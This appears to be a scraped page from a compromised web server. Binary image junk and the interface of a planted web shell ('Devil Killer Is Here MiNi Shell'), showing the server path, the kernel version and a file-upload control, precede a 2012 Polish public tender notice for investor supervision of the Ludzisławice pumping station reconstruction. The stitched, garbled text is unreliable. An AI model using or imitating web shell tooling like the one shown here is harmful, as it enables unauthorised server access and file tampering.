JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120618/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120618/206508-N-2012.html

<p class="kh_header"><b>Gorzów Wielkopolski: Nadzór Inwestorski
dla zadania inwestycyjnego pn.  

Przepompownia Ludzisławice - odbudowa
gm. Santok       woj. lubuskie</b><br>
<b>Numer ogłoszenia: 206508 - 2012; data zamieszczenia: 18.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Lubuski Zarząd Melioracji i Urządzeń Wodnych w Zielonej Górze Oddział w Gorzowie Wielkopolskim , ul. Myśliborska 52, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 95 7285931, faks 95 7285931.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://melioracja.lubuskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nadzór Inwestorski
dla zadania inwestycyjnego pn.  

Przepompownia Ludzisławice - odbudowa
gm. Santok       woj. lubuskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa pełnienia obowiązków nadzoru inwestorskiego nad realizacją  zadania inwestycyjnego pn. Przepompownia Ludzisławice - odbudowa
gm. Santok    woj. lubuskie ,  polegających na zarządzaniu całością zadań i czynności w celu realizacji przedmiotowej inwestycji. 
Pojęcie Nadzoru Inwestorskiego jest tożsame-równoważne z pojęciem Inżyniera Kontraktu.
Nadzór Inwestorski zobowiązany jest wykonać wszystkie czynności faktyczne i prawne należące do Zamawiającego związane z realizacją ww. zadania inwestycyjnego.
Nadzór Inwestorski zobowiązany jest realizować usługę w oparciu o obowiązujące przepisy   prawa polskiego, przy zachowaniu należytej staranności, zgodnie ze sztuką budowlaną i najlepszą praktyką zawodową.
Nadzór Inwestorski nie jest uprawniony do zaciągania zobowiązań finansowych 
w imieniu Zamawiającego ani dokonywania bez pisemnej zgody Zamawiającego zmian 
w zakresie i technologii robót.

Podstawowe obowiązki Nadzoru Inwestorskiego:
- Nadzór Inwestorski w ciągu 14 dni od dnia podpisania umowy o wykonanie niniejszego zamówienia  zapozna się z  dokumentacją techniczną oraz uzgodnieniami i decyzjami   niezbędnymi  do realizacji projektu oraz dokona weryfikacji przedmiarów, kosztorysu  inwestorskiego i STWOiRB dot. robót budowlanych przedmiotowej inwestycji a uwagi przedłoży zamawiającemu na piśmie,
- w ramach wynagrodzenia zapewni wielobranżowy nadzór inwestorski zgodnie z obowiązującym w tym zakresie prawem i rozliczenie finansowe inwestycji,  
-  kontrola jakości robót oraz materiałów, maszyn i urządzeń,  
-  w imieniu inwestora będzie kontaktował się z osobami sprawującymi nadzór autorski. 
 - Nadzór Inwestorski wezwie i wyegzekwuje w imieniu Zamawiającego od projektanta 
    poprawienie lub uzupełnienie dokumentacji w trakcie realizacji robót w przypadku  
    ujawnienia wad tej dokumentacji,
- organizacja i koordynacja realizacji Projektu w zakresie wszystkich robót,
- dostosować godziny pracy do przyszłego wykonawcy robót budowlanych,
- będzie monitorował postępy w realizacji zadania zgodnie z dokumentacją techniczną, dokumentami przetargowymi na roboty budowlane oraz zatwierdzonymi harmonogramami, zidentyfikuje także potencjalne obszary problemów oraz podejmie odpowiednie środki zaradcze,
- sprawdzi czy osoby zatrudnione przez wykonawcę robót budowlanych posiadają kwalifikacje oraz uprawnienia do prowadzenia prac budowlanych,
-  sprawdzi czy wszystkie używane urządzenia i materiały posiadają świadectwa i certyfikaty
    wymagane prawem,
-  nadzoruje terminową realizację harmonogramów finansowego i rzeczowego całego Projektu 
   jak również kontroluje  przepływy finansowe zgodnie z harmonogramem robót,
- będzie kontrolował na bieżąco postęp wykonania robót (w stosunku do zatwierdzonych  
   harmonogramów), 
-  weryfikuje faktury wystawione przez Wykonawcę Robót w związku z realizacją umowy na 
   roboty budowlane, 
- jest zobowiązany do udzielania regularnych konsultacji i doradztwa technicznego 
   Zamawiającemu w zakresie przedmiotowego zadania inwest.,
- kontroluje i potwierdza, że Wykonawca Robót budowlanych dostarcza właściwe materiały i 
   urządzenia wyszczególnione w dokumentacji projektowej. 
- sprawdza jakość wykonywanych robót, a w szczególności zapobiega zastosowaniu 
   materiałów budowlanych i urządzeń wadliwych i nie dopuszczonych do obrotu i stosowania 
   ich na budowie,
-  jest zobowiązany do sprawdzania i odbioru robót budowlanych ulegających zakryciu lub 
   zanikających, a także uczestniczy w odbiorach częściowych i końcowym, 
- wydaje kierownikowi budowy lub kierownikowi robót polecenia potwierdzone wpisem do
  dziennika budowy dotyczące: wykonania prób, wymagających odkrycia robót lub elementów
  zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót budowlanych, 
  dowodów dopuszczenia do obrotu i stosowania w budownictwie wyrobów budowlanych oraz 
  urządzeń technicznych,
- weryfikuje obmiary każdego elementu robót a przyjęta metodologia musi być zgodna z 
  Przedmiarami Robót i Specyfikacjami Technicznymi,
- jest odpowiedzialny za odbieranie od Wykonawcy Robót budowlanych rozliczeń łącznie z 
  dokumentami stanowiącymi ich podstawę, weryfikowanie tych rozliczeń oraz przedkładanie 
  do zatwierdzenia Zamawiającemu faktur częściowych i końcowych,
- jest odpowiedzialny za sprawdzanie pod względem formalnym, merytorycznym i    
  rachunkowym wszelkiego rodzaju kalkulacji, kosztorysów, faktur, a także innych 
  dokumentów przedkładanych przez uczestników procesu inwestycyjnego w trakcie 
  rozliczania części, bądź całości wykonanych robót,
 -  ściśle współpracuje z Zamawiającym i z osobą wskazaną przez Zamawiającego i dostarcza 
   wszystkie niezbędne, żądane dokumenty dotyczące rozliczeń,
 -  jest odpowiedzialny za przedkładanie Zamawiającemu wszystkich raportów, oświadczeń i 
   zapytań dostarczonych przez Wykonawcę Robót budowlanych,
 - egzekwuje od Wykonawcy Robót budowlanych dokumentację powykonawczą, sprawdza ją i 
  zatwierdza w porozumieniu z Zamawiającym,
  - zarządza całym procesem przekazania obiektów do użytkowania,
  - wydaje Wykonawcy Robót budowlanych; Częściowe, Końcowe Protokoły Odbioru,
  - uczestniczy w końcowym rozliczeniu zadania inwest. z uwzględnieniem rozliczenia i 
    przekazania środków trwałych,
 - opiniuje proponowane przez Wykonawcę Robót budowlanych i podwykonawców 
  rozwiązania i przedkłada do zatwierdzenia Zamawiającemu. W przypadku opinii negatywnej  
  przedstawi Wykonawcy Robót pisemne uzasadnienie, 
- po uzgodnieniu z Zamawiającym, wykona wszystkie inne czynności, nie wymienione w 
  umowie, które zostaną uznane za niezbędne dla prawidłowej realizacji Robót,
- jest całkowicie odpowiedzialny za odpowiedni dobór zespołu inspektorów nadzoru. Podczas nieobecności któregokolwiek ze specjalistów, wynikającej z urlopu, przedłużającego się zwolnienia lekarskiego lub innego powodu, Nadzór Inwestorski zapewni czasowe zastępstwo specjalistów na cały czas nieobecności zatrudnionych fachowców by uniknąć zwłoki w realizacji robót budowlanych. 
PONADTO:
	Nadzór Inwestorski  będzie zgłaszał Zamawiającemu potrzeby występowania do odpowiednich organów, gdy będą zachodzić okoliczności uzasadniające taką czynność, o uzyskanie dokumentów, uzgodnień i pozwoleń wynikających z realizacji inwestycji, zgodnie z obowiązującymi aktami prawnymi.
       Jest zobowiązany do przekazywania do Zamawiającego albo podmiotom przez niego wskazanym, na każde wezwanie, informacji i wyjaśnień na temat realizacji zadania inwest,, w tym także do przedkładania będących w jego posiadaniu oryginałów dokumentów lub ich poświadczonych kopii, w szczególności dokumentów rozliczeniowych, w terminach wskazanych przez Zamawiającego.
      Przeprowadzać będzie bieżącą analizę dotyczącą ponoszonych nakładów inwestycyjnych w porównaniu z wielkościami zawartymi w kosztorysie inwestorskim i kosztorysie ofertowym, na podstawie którego podpisano Umowę z Wykonawcą Robót.
     Uczestniczy w odbiorze inwestycji lub jej części określonej w umowie z  Wykonawcą Robót budowlanych, zgodnie z Ustawą Prawo budowlane.
     Przygotowuje rozliczenie zadania inwestycyjnego po odbiorze zadania od Wykonawcy Robót budowlanych, zarówno częściowego jak i końcowego
     Przygotowuje dokumentację niezbędną do dochodzenia, zabezpieczenia i egzekwowania od uczestników procesu inwestycyjnego wszelkiego rodzaju roszczeń związanych z zabezpieczeniem należytego wykonania umowy, rękojmi, kar umownych i odszkodowań pozostających w związku z niewykonaniem bądź nienależytym wykonaniem zawartych z nimi Umów, a także nadzorowanie ciągłości i aktualizacji wnoszonych przez Wykonawcę Robót zabezpieczeń należytego wykonania umów.
     Przygotowuje dokumentację do rozliczenia w ramach zawartej w niniejszym postępowaniu umowy na potrzeby sprawozdań dotacji otrzymanych z zewnątrz
     Wykonuje wszystkie czynności zgodnie z obowiązującymi aktualnie przepisami, a w szczególności zgodnie z ustawą Prawo budowlane i Prawem zamówień publicznych.
     Wszystkie decyzje mogące wpływać na zakres umowy na Roboty Budowlane, jej czas trwania lub cenę wymagają zgody Zamawiającego w formie pisemnej.
Ponadto Nadzór Inwestorski opracuje i przedstawi: 
a) raport z zakresu zrealizowanych prac, wykonywania zadań i obowiązków nałożonych w niniejszym dokumencie na Nadzór. Raport ten składany będzie co najmniej raz na 3 miesiące,
b) raport końcowy z całej swojej działalności  - do złożenia w terminie 1 miesiąca od momentu zakończenia Umowy na Roboty objęte zadaniem inwest.,

 Obowiązki Nadzoru Inwestorskiego szczegółowo zostały określone we wzorze umowy będącym integralną częścią  SIWZ , stanowiącym załącznik nr 9 do SIWZ.
UWAGA!  Informacja na temat możliwości powierzenia przez wykonawcę wykonania części lub całości zamówienia podwykonawcom.
Jeżeli Nadzór Inwestorski planuje możliwość powierzenia części prac podwykonawcom to w ofercie należy wskazać zakres prac, które wykona podwykonawca. 

Nadzór Inwestorski udzieli Zamawiającemu rękojmi na wykonaną przez siebie usługę objętą niniejszym zamówieniem. Okres rękojmi ustala się na 36 miesięcy i liczony będzie od daty podpisania protokołu odbioru końcowego robót budowlanych. W ww. okresie Wykonawca zobowiązany będzie utrzymywać kontakt z Zamawiającym, a w szczególności uczestniczyć w przeglądach gwarancyjnych, które winny odbywać się raz w roku przez okres trwania gwarancji i rękojmi wyznaczonej dla wykonawcy robót budowlanych.
 
Opis podstawowego zakresu robót budowlanych , które będą wykonywane w ramach inwestycji pn. Przepompownia Ludzisławice -odbudowa:

Budynek pompowni, wybudowany w 1974r., zlokalizowany jest na terenie gruntów wsi Ludzisławice gm. Santok woj. lubuskie, w odległości ok.15m od wału letniego i ok. 20m od wału zimowego, na lewym brzegu rzeki Noteć. 
Jest to obiekt czterokondygnacyjny gdzie dwie szczytowe kondygnacje wyniesione są z 3 stron ponad poziom otaczającego terenu natomiast 2 dolne są z 3 stron zagłębione w ziemi. Budynek został wykonany w technologii tradycyjnej murowanej. Główna konstrukcja wspiera się na poziomym układzie ścian nośnych oraz słupach żelbetowych. Stropy wykonane zostały jako element monolityczny żelbetowy. 
Na poziomie parteru znajduje się hala pomp z czterema agregatami pompowymi, warsztat podręczny, węzeł sanitarny oraz cztery oddzielne pomieszczenia komór transformatorów. Na poziomie +1 znajdują się rozdzielnia 15kV oraz dyżurka. Parter oraz kondygnację +1 łączy jednobiegowa żelbetowa klatka schodowa ze spocznikiem. W pomieszczeniach -1 oraz -2 znajdują się maszynownie agregatów pompowych. Poziom -2 jest zalany całkowicie wodą. Budynek jest nakryty stropodachem o spadku 3% w kierunku koryta rzeki. 
Opracowanie obejmuje m.in.:
wymianę istniejących urządzeń technologicznych: pomp, przewodów tłocznych i armatury.
wykonanie instalacji odwadniającej poziom -1, doprowadzenie wody do pompowni: wykonanie studni wierconej i przewodu wodociągowego, odprowadzenie ścieków z pompowni: wykonanie zbiornika bezodpływowego na nieczystości ciekłe i przyłącza kanalizacyjnego,  instalacje wod. - kan. i ogrzewania w budynku pompowni,
remont kanałów dopływowego i odpływowego
 
Projektowane rozwiązania przewidują zachowanie istniejącego układu funkcjonalnego obiektu za wyjątkiem węzła sanitarnego, który będzie dostosowany do obecnych wymagań technicznych. Zlikwidowana zostanie kabina prysznicowa a na jej miejscu powstanie zamknięte pomieszczenie szatni. W głównej hali pomp na parterze zlikwidowane zostaną stare agregaty pompowe a zamiast nich zastosowane będą 4 pompy mocowane na poziomie poziomu -1 zgodnie z częścią technologiczną niniejszej dokumentacji. Na poziomie -2 zamurowane zostaną przejścia pomiędzy komorami i utworzone zostaną cztery niezależne komory z oddzielnymi wejściami z poziomu -1. Istniejące otwory w stropie pomiędzy parterem a poziomem -1 zabezpieczone zostaną klapami stalowymi z uchwytami umożliwiającymi podniesienie ich za pomocą istniejącej w budynku suwnicy.
 W głównej hali pomp na parterze zlikwidowane zostaną stare agregaty pompowe a zamiast nich zastosowane będą 4 pompy mocowane na poziomie poziomu -1 zgodnie z częścią technologiczną niniejszej dokumentacji. Na poziomie -2 zabetonowane zostaną przejścia pomiędzy komorami i utworzone zostaną cztery niezależne komory z oddzielnymi wejściami z poziomu -1. Istniejące otwory w stropie pomiędzy parterem a poziomem -1 zabezpieczone zostaną klapami stalowymi z uchwytami umożliwiającymi podniesienie ich za pomocą istniejącej w budynku suwnicy.
W celu prawidłowego zamocowania nowych pomp zostaną wykonane nowe ściany komór pomp, równoległe do starych ścian. Zostanie również wykonany nowy strop pod istniejącym stropem poz. -1, w celu prawidłowego przejęcia obciążenia pomp. (istniejące otwory nie odpowiadają nowym pompom).
Zadaszeniem budynku pozostanie stropodach o nachyleniu 3% w kierunki koryta rzeki. Stare warstwy zewnętrzne dachu zostaną zdemontowane do poziomu żelbetu i zamiast nich położone będą nowe wraz z paroizolacją, izolacją termiczną (styropian twardy gr. 12cm), następnie wykonana zostanie warstwa wylewki cementowej ze spadkiem zbrojonej siatką przeciwskurczową, na którą to wylewkę położone zostaną dwie warstwy papy termozgrzewalnej. Pierwsza z warstw będzie papą podkładową na którą położona zostanie papa wierzchniego krycia w kolorze czarnym. Ponadto po obrysie istniejącego stropodachu, z 3 stron budynku, wykonana zostanie niska attyka, która będzie regulowała spływ wody deszczowej. Attyka wykończona zostanie obróbka blacharską w kolorze RAL 7043. 
W budynku wymieniona zostanie cała stolarka okienna i wstawiona będzie nowa dwuszybowa oprawiona w systemowe profile aluminiowe. Okna nietypowe wykonane na zamówienie. Profile okienne malowane proszkowo. Zabezpieczone antywłamaniowo czujkami magnetycznymi mocowanymi w ościeżnicach.
 W całym budynku wymieniona zostanie stolarka drzwiowa. Wszystkie drzwi zewnętrzne łącznie z wrotami bramy wjazdowej na halę pomp projektuje się jako drzwi stalowe - ocieplane osadzone w stalowych ościeżnicach. Kolor drzwi zewnętrznych RAL 7043. Drzwi wewnętrzne wykonane będą również jako drzwi stalowe bez warstwy izolacji termicznej. 
Posadzki w pomieszczeniach na poziomie +1 będą odświeżone i oczyszczone. W hali agregatów pompowych na parterze posadzka zostanie wymienioną na nową - posadzkę z płytek terakotowych chemoodpornych. 
 Zasilanie budynku przepompowni po stronie średniego napięcia 15 kV, pozostaje bez zmian. Zasilanie projektowanej rozdzielni potrzeb własnych R2, odbywać się będzie ze stacji transformatorowej, zasilanie z transformatora potrzeb własnych, Tr 100 kVA. Zasilanie przewiduje się wykonać przewodem YLY 5x25 mm2.
 Demontaż istniejących instalacji elektrycznych obejmuje:
-demontaż wszystkich instalacji elektrycznych, z wyjątkiem instalacji stacji transformatorowej, w pomieszczeniu rozdzielni średniego napięcia i pomieszczeniu komór transformatorowych,
-demontaż instalacji oświetlenia zewnętrznego, zabudowanego na elewacji budynku,
-demontaż instalacji odgromowej budynku.
Projektowane instalacje elektryczne:
oświetlenie zewnętrzne na elewacji budynku, oświetlenie podstawowe i ewakuacyjne,
gniazda wtykowe 230V, 400V, zasilanie rozdzielni potrzeb własnych, połączenia wyrównawcze i uziemienia robocze oraz ochronne, instalacje odgromowe i uziemiające,
rozdzielnica potrzeb własnych, zasilanie grzejników elektrycznych pomieszczeń,
instalacje zasilania podgrzewacza cwu.
Projekt budowlany nie obejmuje: modernizacji stacji transformatorowej, wymiany rozdzielni średniego napięcia 15 kV, wymiany transformatorów, instalacji alarmowej i przeciw włamaniowej, rozdzielni niskiego napięcia R1, linii napowietrznej 15 kV, zasilającej budynek przepompowni.
Jako ujęcie wody do pompowni zaprojektowano studnię wierconą zlokalizowaną w sąsiedztwie istniejącej studni nieczynnej. Przewiduje się: wykonanie odwiertu do głębokości około 15,0m, zainstalowanie filtra, zainstalowanie pompy głębinowej o mocy 0,4kW, wykonanie obudowy studni zainstalowanie szafki sterowniczej. Zaprojektowano pompę głębinową o mocy 0,4kW, wydajności Q=2,0m3/h i wys. podnoszenia H=50m. Projektowaną pompę należy zakupić łącznie z kablem o długości 50m i szafką sterowniczą pompy. Szafkę zlokalizować przy ogrodzeniu pompowni melioracyjnej. Obudowę studni zaprojektowano z kręgów żelbetowych, prefabrykowanych o średnicy 1,5m, łączonych na uszczelki gumowe. Studnię wyposażono we właz kanalizacyjny typu ciężkiego, stopnie złazowe i wentylację. Wokół studni zaprojektowano utwardzenie z kostki brukowej. 
Trasę przewodu wodociągowego doprowadzającego wodę ze studni do pompowni zaprojektowano przez wał przeciwpowodziowy. Przewód należy wykonać metodą bezwykopową, za pomocą przecisku hydraulicznego sterowanego kontrolą pilota, nie naruszając struktury wału. Przewód wodociągowy o średnicy DN40 (D50x4,6) i długości l=55,0m wykonany z rur PE łączonych za pomocą zgrzewania elektrooporowego, zostanie umieszczony w stalowej rurze osłonowej DN100 (108x5,6) za pomocą płóz ślizgowych, a przestrzeń między rurą osłonową i przewodową wypełniona mieszanką GP-20. Końce rury osłonowej zabezpieczone będą manszetami.
 Odprowadzenie ścieków bytowo - gospodarczych zaprojektowano do zbiornika bezodpływowego na nieczystości ciekłe - studzienki kanalizacyjnej zlokalizowanej na terenie pompowni. Projektowany zbiornik należy wykonać z elementów prefabrykowanych skonstruowanych wg PN-84/B-03264, PN-B-10729: 1999, łączonych na uszczelki gumowe stożkowe. Zbiornik składa się z: monolitowej części dolnej i kręgów ze zintegrowaną uszczelką, płyty pokrywowej z otworem na właz i włazu żeliwnego O600 typu ciężkiego (klasy D) wg PN-EN 124:2000. 
 Projektuje się remont kanału dopływowego i odpływowego na odcinku bezpośrednio przy przepompowni poprzez przywrócenie do stanu pierwotnego. W tym celu przewiduje się  użycie pogłębiarek ssąco-refulujących. 

Powyższy opis jest poglądowy i sporządzony został na podstawie opracowanej dokumentacji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wymagane wadium w wysokości 1500,00 zł (słownie: jeden tysiąc pięćset złotych)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tzn. że w okresie ostatnich trzech lat przed dniem wszczęcia     postępowania o udzielenie zamówienia a jeśli okres prowadzenia działalności jest krótszy to w tym okresie: pełnili Nadzór Inwestorski  z zakresu robót obejmujących  budowę, przebudowę lub odbudowę minimum jednej przepompowni melioracyjnej o wydajności powyżej 2,0m3/s o wartości robót brutto nie mniej niż 3,5 mln zł. lub  dwóch obiektów z zakresu budownictwa wodnego a zsumowana  wartość robót brutto  nie mniejsza niż 7,0 mln zł.  (zgodnie z niżej wymienionymi kategoriami obiektów budowlanych:  
nr XXVII z wyłączeniem śluz wałowych, syfonów, wałów przeciwpowodziowych, kanałów, opasek i ostróg brzegowych oraz rowów melioracyjnych, 
nr XXX - z wyłączeniem obiektów służących do zrzutów ścieków, stacji strefowych, stacji uzdatniania wody oraz oczyszczalni ścieków, wg załącznika do ustawy Prawo Budowlane z dnia 7 lipca 1994r.)   
i załączyli dokumenty potwierdzające (np. referencje), że usługi te zostały wykonane należycie. (wykaz zrealizowanych zamówień - zał. nr 3). 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunek może być spełniony łącznie.
Ocena spełnienia w/w warunków dokonana zostanie metodą spełnia - nie spełnia w oparciu o informacje zawarte w dokumentach i oświadczeniach. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż w/w warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>tzn. dysponować osobami posiadającymi uprawnienia budowlane do sprawowania samodzielnych funkcji zgodnie z ustawą z dnia 7 lipca1994r. Prawo budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) o następujących kwalifikacjach i uprawnieniach (wykaz kadry oferenta  - wg. zał. nr 4 )

a) Kierownik zespołu koordynującego prace Nadzoru Inwestorskiego, posiadający wykształcenie budowlane, który musi wykazać, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, kierował co najmniej jednym Projektem dotyczącym budowy, przebudowy lub odbudowy jednej przepompowni melioracyjnej o wydajności powyżej 2,0m3/s lub dwóch obiektów z zakresu budownictwa wodnego   (jak w dziale V pkt.2), oraz posiadający doświadczenie w kierowaniu zespołem inspektorów nadzoru,

b) Inspektor nadzoru branży konstrukcyjno-budowlanej - musi posiadać  uprawnienia budowlane do sprawowania samodzielnych funkcji zgodnie z ustawą z dnia 7 lipca1994r. Prawo budowlane (Dz. U. z 2010r. Nr 243, poz. 1623 z późn. zm.) bez ograniczeń. 
Inspektor budowlany musi wykazać się, iż w przeciągu ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, pełnił funkcję inspektora nadzoru w zakresie swoich uprawnień przynajmniej jednej inwestycji o wartości minimum 3,5 mln zł. brutto lub dwóch inwestycji (jak w dziale V pkt.2), o wartości 7,0 mln zł. brutto łącznie oraz który jest członkiem właściwej okręgowej izby inżynierów budownictwa.,

